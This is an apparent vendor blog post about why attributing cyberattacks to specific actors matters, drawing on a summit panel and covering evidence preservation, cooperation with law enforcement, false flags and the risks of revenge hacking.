Whodunnit? The superior detective dazzles us with brilliance, skill, and patience to unmask the bad guy. The interplay of forensic science and psychological insight have fascinated us from Sherlock Holmes to the CSI television series. Sometimes the answer is completely surprising, as in Murder on the Orient Express. Other times, the mystery is known to us all, and promptly dismissed: “The Major has been shot. Round up the usual suspects.”
Earlier this week the iSMG Fraud and Breach Prevention Summit in New York City featured a fascinating conversation on the value of attribution, led by Gartner’s Avivah Litan. The panel was called: “Moving from Indicators of Compromise to Indicators of Attack: But Will Attacker Attribution Really Help Us?” The panelists were Jackie Castelli from CrowdStrike, Noam Jolles from Diskin Advanced Technologies, and Richard T. Jacobs from the FBI New York Division. This note offers my observations on that conversation.
In the cybersecurity domain, what is the value of attribution? There are four possible reasons for identifying the individual or team that caused an information security breach.
Preserving evidence should be a part of any organization’s cyber incident response plan. Not having a plan can lead to very difficult choices. One firm had to choose between preserving the evidence or re-establishing online operations. They decided to restore their systems to a state before the attack occurred and get back on line. This choice has a few problems. First, by restoring the system to its state before the attack, the system recreated same vulnerabilities that were used against it successfully. The attacker could cause the same problem again with little difficulty. Second, the attacker did not have to cover their tracks: the victim did. The attacker could use the same attack against another victim, with no prior information available to establish a pattern.
Law enforcement ultimately must determine the actual source of an attack. By working with law enforcement, firms can help them develop and evaluate evidence. As a colleague wrote,
“One of the main reasons we don’t attribute publically is that it is so easy to get it wrong. The only people who realistically can say for sure that a criminal attack occurred is Law Enforcement – and even then only after a reviewing all evidence, supplied by industry and gathered themselves, including those from seized suspect machines. For state level attribution, only a military or intelligence agency who through their own counter-intelligence operations have a deep understand of the person on the other side. Otherwise, it is very easy to drop false flags – clues that point to another attack group. Imagine the scenario of an intelligence unit from country X hitting a gas company in the Middle East. Adding in some Russian strings and, given Russia’s natural interest in gas as a resource, they will for sure get the blame. Consider a criminal group hacking a bank: Drop one copy of a Lazarus malware on the machine, and North Korea will be accused. Even if you think it is a group from country X, is it a state-group, state-sponsored, contractor, state-condoned, dissident, patriot, criminal, etc.?”
Governments need to know who attacked their interests to frame a proportionate response. Knowing the actual source lets governments act confidently against the actual enemy, rather than launch a misguided action. Further, in some cases, while the attack may have originated from a government-sponsored organization, the individual perpetrating the attack may not have been acting with governmental authorization. A rogue individual may exploit the capabilities provided him or her without direct orders to do so.
Potential targets can well benefit from understanding the sequence of events culminating in a cyber-incident against them. In this case, attribution means understanding the attack well enough to anticipate and interrupt it before actual harm occurs. By identifying the specific attack, the target can take defensive measures to avoid harmful consequences. The US CERT and the ISACs provide alerts about attacks with sufficient information for this purpose.
Revenge is never a good idea. Individuals and corporations may have a fair level of certainty about the source of an attack. Beware though! A vengeful act could disrupt an ongoing criminal investigation. The vengeful actor itself could face a criminal investigation: all hacking is illegal, regardless of which side is doing it, or started it. Cyber criminals, hactivists, and foreign intelligence services have significant skills. They can plant misleading clues pointing to another party. While it may be embarrassing to suffer a breach, it would be substantially more consequential to disrupt some innocent third party in an erroneous and misguided response to punish the suspected perpetrator.
Moreover, sometimes an attack is not actually an attack. Consider the recent OnionDog incident: http://blog.trendmicro.com/trendlabs-security-intelligence/oniondog-not-targeted-attack-cyber-drill/
At Trend Micro we do not attribute attacks to nations. We share evidence with national law enforcement agencies to assist in their pursuit of a wrongdoer. See these blog posts on fighting cybercrime, collaboration with law enforcement, and working with Interpol, and this statement by our late CTO, Raimund Genes, from our YouTube Channel. We strongly discourage any (potentially criminal) acts of retribution or lex talionis. We work diligently to reveal attack patterns to assist our clients and the larger world to recognize, prepare for, and thwart hostile and disruptive acts.
Who did it? If they didn’t do much, it doesn’t much matter.
What are your thoughts on this? Post a comment below, or tweet me @WilliamMalikTM.